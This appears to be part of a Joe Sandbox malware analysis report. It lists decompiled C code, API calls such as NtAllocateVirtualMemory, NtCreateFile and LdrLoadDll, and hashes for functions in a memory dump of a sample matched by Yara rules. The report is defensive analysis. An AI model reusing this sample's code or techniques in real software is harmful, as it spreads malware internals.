                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::
                                                                                              • String ID: A
                                                                                              • API String ID: 1333004437-3554254475
                                                                                              • Opcode ID: c9da4e2c6686649faab20038695d01b31fe5cfdc3f1d6bd83beac3d89f3e1a60
                                                                                              • Instruction ID: 370c61f1e26deafc674a22748379a2077d4701398dd6aaaeda1dd7ef7d1e079c
                                                                                              • Opcode Fuzzy Hash: c9da4e2c6686649faab20038695d01b31fe5cfdc3f1d6bd83beac3d89f3e1a60
                                                                                              • Instruction Fuzzy Hash: 12215BB0900209EFDF95EF98D490EECBF76FB54B48F408059E8566B256CB70A685CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01361D6C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 58%
                                                                                              			E01361D6C(void* __ecx, intOrPtr _a4, long long _a8) {
				char _v8;
				long long _v12;
				wchar_t* _t9;
				wchar_t* _t14;
				int _t23;
				long long* _t25;

				_push(__ecx);
				_push(__ecx);
				_push(__ecx);
				asm("fst qword [ebp-0x8]");
				 *_t25 = _a8;
				_t14 = "%lf";
				_t2 = E0135B59C(0, 0, _t14, __ecx) + 1; // 0x1
				_t23 = _t2;
				_t9 = E0135B660(0x13a0b34, _t23);
				 *((long long*)(_t25 + 0x14)) = _v12;
				swprintf(_t9, _t23, _t14, 0x13a0b34, 0x13a0b34);
				_v8 = 0;
				_push(_v8);
				E01361CB8(_a4, _t9);
				return _a4;
			}









                                                                                              0x01361d6f
                                                                                              0x01361d70
                                                                                              0x01361d77
                                                                                              0x01361d79
                                                                                              0x01361d7c
                                                                                              0x01361d7f
                                                                                              0x01361d96
                                                                                              0x01361d96
                                                                                              0x01361d9a
                                                                                              0x01361da6
                                                                                              0x01361dac
                                                                                              0x01361db7
                                                                                              0x01361dbb
                                                                                              0x01361dbf
                                                                                              0x01361dcb

                                                                                              APIs
                                                                                              • ___swprintf_l.LIBCMT ref: 01361D89
                                                                                                • Part of subcall function 0135B59C: _vsnprintf.LEGACY_STDIO_DEFINITIONS ref: 0135B5AC
                                                                                              • swprintf.LIBCMT ref: 01361DAC
                                                                                                • Part of subcall function 0135B580: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0135B592
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l__vswprintf_c_l_vsnprintfswprintf
                                                                                              • String ID: %lf
                                                                                              • API String ID: 3672277462-2891890143
                                                                                              • Opcode ID: c03f89e356d3e3aa0ce9a09ec7d95575353e78f839170746a99443903db80e9e
                                                                                              • Instruction ID: eff257b3382d12e767d6d5b30eadb67783f0a2cc65ad49159563db2b9672d803
                                                                                              • Opcode Fuzzy Hash: c03f89e356d3e3aa0ce9a09ec7d95575353e78f839170746a99443903db80e9e
                                                                                              • Instruction Fuzzy Hash: 11F0CDB550000DBADB08AB98CC89EBFBA6CDB85658F114188FA4416240DB75AE0493B2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01361D10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 71%
                                                                                              			E01361D10(void* __ecx, intOrPtr _a4, long long _a8) {
				char _v8;
				wchar_t* _t9;
				wchar_t* _t14;
				int _t23;
				long long* _t25;

				_push(__ecx);
				_push(__ecx);
				 *_t25 = _a8;
				_t14 = "%lf";
				_t2 = E0135B59C(0, 0, _t14, __ecx) + 1; // 0x1
				_t23 = _t2;
				_t9 = E0135B660(0x13a0b34, _t23);
				 *((long long*)(_t25 + 0x14)) = _a8;
				swprintf(_t9, _t23, _t14, 0x13a0b34, 0x13a0b34);
				_v8 = 0;
				_push(_v8);
				E01361CB8(_a4, _t9);
				return _a4;
			}








                                                                                              0x01361d13
                                                                                              0x01361d1a
                                                                                              0x01361d1c
                                                                                              0x01361d1f
                                                                                              0x01361d36
                                                                                              0x01361d36
                                                                                              0x01361d3a
                                                                                              0x01361d46
                                                                                              0x01361d4c
                                                                                              0x01361d57
                                                                                              0x01361d5b
                                                                                              0x01361d5f
                                                                                              0x01361d6b

                                                                                              APIs
                                                                                              • ___swprintf_l.LIBCMT ref: 01361D29
                                                                                                • Part of subcall function 0135B59C: _vsnprintf.LEGACY_STDIO_DEFINITIONS ref: 0135B5AC
                                                                                              • swprintf.LIBCMT ref: 01361D4C
                                                                                                • Part of subcall function 0135B580: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0135B592
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l__vswprintf_c_l_vsnprintfswprintf
                                                                                              • String ID: %lf
                                                                                              • API String ID: 3672277462-2891890143
                                                                                              • Opcode ID: 2f4c3c0dde8f458d9cd9f263cfeb3c7ba69c09bb08691c51c4519f6eadbb20fd
                                                                                              • Instruction ID: 78a49293d2f5e7ddeb59bd389bc2a2364e25fcf4b424300c9d6f17d59f31dca8
                                                                                              • Opcode Fuzzy Hash: 2f4c3c0dde8f458d9cd9f263cfeb3c7ba69c09bb08691c51c4519f6eadbb20fd
                                                                                              • Instruction Fuzzy Hash: 24F0B4B510000DBADB04AB58CC85FBF7B6DDF8965CF118598FA451B240DB759E04D3B1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Executed Functions

                                                                                              Function 0041E7CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memorynativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 41e7cd-41e810 call 41f243 NtAllocateVirtualMemory
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E7CD(void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t14;

				_t10 = _v0;
				E0041F243( *((intOrPtr*)(_v0 + 0x14)), _t10, _t10 + 0xa8c,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t14;
			}





                                                                                              0x0041e7d6
                                                                                              0x0041e7ea
                                                                                              0x0041e80c
                                                                                              0x0041e810

                                                                                              APIs
                                                                                              • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E80C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateMemoryVirtual
                                                                                              • String ID: ($
                                                                                              • API String ID: 2167126740-1917586925
                                                                                              • Opcode ID: 41196e49ac4ea828d442559080510825f434a657ed3d3ee46247645fae91569f
                                                                                              • Instruction ID: 75c01ba8265e86b6e799f606f6827c4ef4659bfb27b3c208fb82fe6623ca5877
                                                                                              • Opcode Fuzzy Hash: 41196e49ac4ea828d442559080510825f434a657ed3d3ee46247645fae91569f
                                                                                              • Instruction Fuzzy Hash: 63F015B6210208BBCB14DF89DC81EEB77ADAF88754F118159BE08A7241C630FD11CBB4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E5ED Relevance: 1.6, APIs: 1, Instructions: 70filenativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 176 41e5ed-41e5f1 177 41e5f3-41e644 call 41f243 NtCreateFile 176->177 178 41e5b5-41e5ec call 41f243 176->178
                                                                                              C-Code - Quality: 60%
                                                                                              			E0041E5ED(char __ecx, char* __edx, void* __eflags, long _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t35;
				intOrPtr* _t36;

				asm("out 0x1e, eax");
				 *__edx = __ecx;
				if(__eflags > 0) {
					asm("in al, dx");
					_t23 = _a8;
					_t3 = _t23 + 0xa68; // 0xa90
					_t36 = _t3;
					E0041F243(_a8[5], _t23, _t36, _a8[5], 0, 0x27);
					return  *((intOrPtr*)( *_t36))(_a12, _a16, _a20, _a24, _a28, _t35);
				} else {
					__ebp = __esp;
					__eax = _a4;
					__ecx =  *((intOrPtr*)(__eax + 0x14));
					_t11 = __eax + 0xa6c; // 0xa6c
					__esi = _t11;
					__eax = E0041F243( *((intOrPtr*)(__eax + 0x14)), __eax, __esi,  *((intOrPtr*)(__eax + 0x14)), 0, 0x28);
					__edx = _a48;
					__eax = _a44;
					__ecx = _a40;
					__edx = _a36;
					__eax = _a32;
					__ecx = _a28;
					__edx = _a24;
					__eax = _a20;
					__ecx = _a16;
					__edx = _a12;
					__eax = _a8;
					__ecx =  *__esi;
					__eax = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}







                                                                                              0x0041e5ed
                                                                                              0x0041e5ef
                                                                                              0x0041e5f1
                                                                                              0x0041e5b5
                                                                                              0x0041e5b6
                                                                                              0x0041e5c2
                                                                                              0x0041e5c2
                                                                                              0x0041e5ca
                                                                                              0x0041e5ec
                                                                                              0x0041e5f3
                                                                                              0x0041e5f4
                                                                                              0x0041e5f6
                                                                                              0x0041e5f9
                                                                                              0x0041e602
                                                                                              0x0041e602
                                                                                              0x0041e60a
                                                                                              0x0041e60f
                                                                                              0x0041e612
                                                                                              0x0041e615
                                                                                              0x0041e61c
                                                                                              0x0041e620
                                                                                              0x0041e624
                                                                                              0x0041e628
                                                                                              0x0041e62c
                                                                                              0x0041e630
                                                                                              0x0041e634
                                                                                              0x0041e638
                                                                                              0x0041e63c
                                                                                              0x0041e640
                                                                                              0x0041e642
                                                                                              0x0041e643
                                                                                              0x0041e644
                                                                                              0x0041e644

                                                                                              APIs
                                                                                              • NtCreateFile.NTDLL(00000060,00000000,?,0041935F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041935F,?,00000000,00000060,00000000,00000000), ref: 0041E640
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: c2940defc1f95fd30518e2f85d8637610e3b44d043bb621822615bc0800cbd0f
                                                                                              • Instruction ID: bf58b033f4df4117e7473d6230dd595e805d3fddb0b0a0f6bc399e62227eb295
                                                                                              • Opcode Fuzzy Hash: c2940defc1f95fd30518e2f85d8637610e3b44d043bb621822615bc0800cbd0f
                                                                                              • Instruction Fuzzy Hash: C71112B2604208BFCB08DF98DC85EEB37ADEF8C754F048258BA0C97241D631E951CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040CF23 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 200 40cf23-40cf3f 201 40cf47-40cf4c 200->201 202 40cf42 call 420f13 200->202 203 40cf52-40cf60 call 421433 201->203 204 40cf4e-40cf51 201->204 202->201 207 40cf70-40cf81 call 41f7b3 203->207 208 40cf62-40cf6d call 4216b3 203->208 213 40cf83-40cf97 LdrLoadDll 207->213 214 40cf9a-40cf9d 207->214 208->207 213->214
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040CF23(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E00420F13( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00421433(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E004216B3( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F7B3(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                              0x0040cf2c
                                                                                              0x0040cf3f
                                                                                              0x0040cf42
                                                                                              0x0040cf47
                                                                                              0x0040cf4c
                                                                                              0x0040cf56
                                                                                              0x0040cf5b
                                                                                              0x0040cf5e
                                                                                              0x0040cf60
                                                                                              0x0040cf68
                                                                                              0x0040cf6d
                                                                                              0x0040cf6d
                                                                                              0x0040cf74
                                                                                              0x0040cf7c
                                                                                              0x0040cf7f
                                                                                              0x0040cf81
                                                                                              0x0040cf95
                                                                                              0x00000000
                                                                                              0x0040cf97
                                                                                              0x0040cf9d
                                                                                              0x0040cf51
                                                                                              0x0040cf51
                                                                                              0x0040cf51

                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID:
                                                                                              • API String ID: 2234796835-0
                                                                                              • Opcode ID: 2d8971ab7e40216f1ab7880a6b3bd7b14f9e717b1ef25046fbf816b69d0e01bc
                                                                                              • Instruction ID: 5e04f6221a37e6357fdc510ce1da2c9258563d4a4a23712c115eaecd70357e5d
                                                                                              • Opcode Fuzzy Hash: 2d8971ab7e40216f1ab7880a6b3bd7b14f9e717b1ef25046fbf816b69d0e01bc
                                                                                              • Instruction Fuzzy Hash: D30152B1E4010EABDF10DBA1DD82F9EB3789B54308F0042A6E908A7280F634EB448B95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E69D Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 215 41e69d-41e6a1 216 41e6a3-41e6ec call 41f243 NtReadFile 215->216 217 41e6ed-41e6ef 215->217
                                                                                              APIs
                                                                                              • NtReadFile.NTDLL(00419523,004149F3,FFFFFFFF,0041900D,00000002,?,00419523,00000002,0041900D,FFFFFFFF,004149F3,00419523,00000002,00000000), ref: 0041E6E8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 32c8df3c70d67261ae50247031a770c3232371363107fb8c2be793b250d4e9c9
                                                                                              • Instruction ID: afefd89c63c408e271d207366b207e4e6e1d150e5249734bbce09756756f7a8e
                                                                                              • Opcode Fuzzy Hash: 32c8df3c70d67261ae50247031a770c3232371363107fb8c2be793b250d4e9c9
                                                                                              • Instruction Fuzzy Hash: 2FF014B6200208AFCB04DF9ACC84EEB77A9EF8C754F118258BE0D97240D630E941CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E5F3 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 220 41e5f3-41e644 call 41f243 NtCreateFile
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E5F3(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                                              0x0041e602
                                                                                              0x0041e60a
                                                                                              0x0041e640
                                                                                              0x0041e644

                                                                                              APIs
                                                                                              • NtCreateFile.NTDLL(00000060,00000000,?,0041935F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041935F,?,00000000,00000060,00000000,00000000), ref: 0041E640
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                                                              • Instruction ID: 896d7442baf9be4756d905739e1f90aa296932759f722aab2a73c44ca3a6dc04
                                                                                              • Opcode Fuzzy Hash: ff6043353ceb920c5c6b95fa545531b6d027e3119837083dac9160f643623646
                                                                                              • Instruction Fuzzy Hash: D3F0BDB2204208ABCB08CF89DC85EEB37ADAF8C754F018248BA0997241C630E8518BA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E6A3 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 223 41e6a3-41e6ec call 41f243 NtReadFile
                                                                                              C-Code - Quality: 37%
                                                                                              			E0041E6A3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t3 = _a4 + 0xa74; // 0xa76
				_t27 = _t3;
				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _t13, _t27,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                                                              0x0041e6b2
                                                                                              0x0041e6b2
                                                                                              0x0041e6ba
                                                                                              0x0041e6e8
                                                                                              0x0041e6ec

                                                                                              APIs
                                                                                              • NtReadFile.NTDLL(00419523,004149F3,FFFFFFFF,0041900D,00000002,?,00419523,00000002,0041900D,FFFFFFFF,004149F3,00419523,00000002,00000000), ref: 0041E6E8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                                                              • Instruction ID: a52c969a109bbc10a8a1a781a5aa37a0394cb6bb67041f9c77339075023d92d4
                                                                                              • Opcode Fuzzy Hash: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                                                              • Instruction Fuzzy Hash: 4EF0FFB2200208ABCB04DF89DC84EEB77ADAF8C714F018248BA0DA7241C630E8118BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E7D3 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 226 41e7d3-41e7e9 227 41e7ef-41e810 NtAllocateVirtualMemory 226->227 228 41e7ea call 41f243 226->228 228->227
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E7D3(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                                              0x0041e7ea
                                                                                              0x0041e80c
                                                                                              0x0041e810

                                                                                              APIs
                                                                                              • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E80C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateMemoryVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 2167126740-0
                                                                                              • Opcode ID: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                                                              • Instruction ID: 27bf8a3fb07fce7131f8418fc0fb77bd2b10fdbd594230fdd84e61d9d7c2cc87
                                                                                              • Opcode Fuzzy Hash: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                                                              • Instruction Fuzzy Hash: BBF01EB6200208ABCB18DF89DC81EEB77ADAF88754F018159BE0897241C630F911CBB4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E723 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E723(intOrPtr _a4, void* _a8) {
				long _t8;

				E0041F243( *((intOrPtr*)(_a4 + 0x14)), _a4, _t5 + 0xa7c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                                              0x0041e73a
                                                                                              0x0041e748
                                                                                              0x0041e74c

                                                                                              APIs
                                                                                              • NtClose.NTDLL(00410328,00000000,?,00410328,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E748
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              • Opcode ID: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                                                              • Instruction ID: 9c4ed7dd7ad381e5692115c9670513ce9f617838e6ca6e8741f9ee3af2ac2269
                                                                                              • Opcode Fuzzy Hash: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                                                              • Instruction Fuzzy Hash: 3CD01776604214ABD610EBA9DC89FD77BACDF48664F0184A9BA1C5B242C571FA0086E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E943 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 3 41e943-41e96f call 41f243 ExitProcess
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E943(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F243( *((intOrPtr*)(_a4 + 0x164)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x164)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                                              0x0041e946
                                                                                              0x0041e95d
                                                                                              0x0041e96b

                                                                                              APIs
                                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E96B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.301544230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_cmezd.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID: w5@
                                                                                              • API String ID: 621844428-2048009441
                                                                                              • Opcode ID: ddff7cea5deb504553f35d9d56e2b182a7c93aee5d24c6ec521c17bd09e3aeca
                                                                                              • Instruction ID: 28662ead1a8a2610f8e7ad364a80deeb4b3648c83f3036173ff49b3b7ba48b6c
                                                                                              • Opcode Fuzzy Hash: ddff7cea5deb504553f35d9d56e2b182a7c93aee5d24c6ec521c17bd09e3aeca
                                                                                              • Instruction Fuzzy Hash: CAD01776A003147BCA20EB99CC85FD777ACDF457A4F0180A5BA4C5B282C675BA00C7E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E935 Relevance: 3.0, APIs: 2, Instructions: 36memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 21%
                                                                                              			E0041E935() {

				asm("daa");
				asm("int 0xa2");
				asm("loope 0xffffff9e");
				asm("stc");
				_push(0x9f547df3);
				_t7 =  *0xFFFFFFFF8BEC8B5D;
				E0041F243( *((intOrPtr*)( *0xFFFFFFFF8BEC8B5D + 0x164)), _t7, _t7 + 0xaa8,  *((intOrPtr*)( *0xFFFFFFFF8BEC8B5D + 0x164)), 0, 0x36);
				ExitProcess( *0xFFFFFFFF8BEC8B61);
			}



                                                                                              0x0041e935
                                                                                              0x0041e938
                                                                                              0x0041e93a
                                                                                              0x0041e93c
                                                                                              0x0041e93d
                                                                                              0x0041e946
                                                                                              0x0041e95d
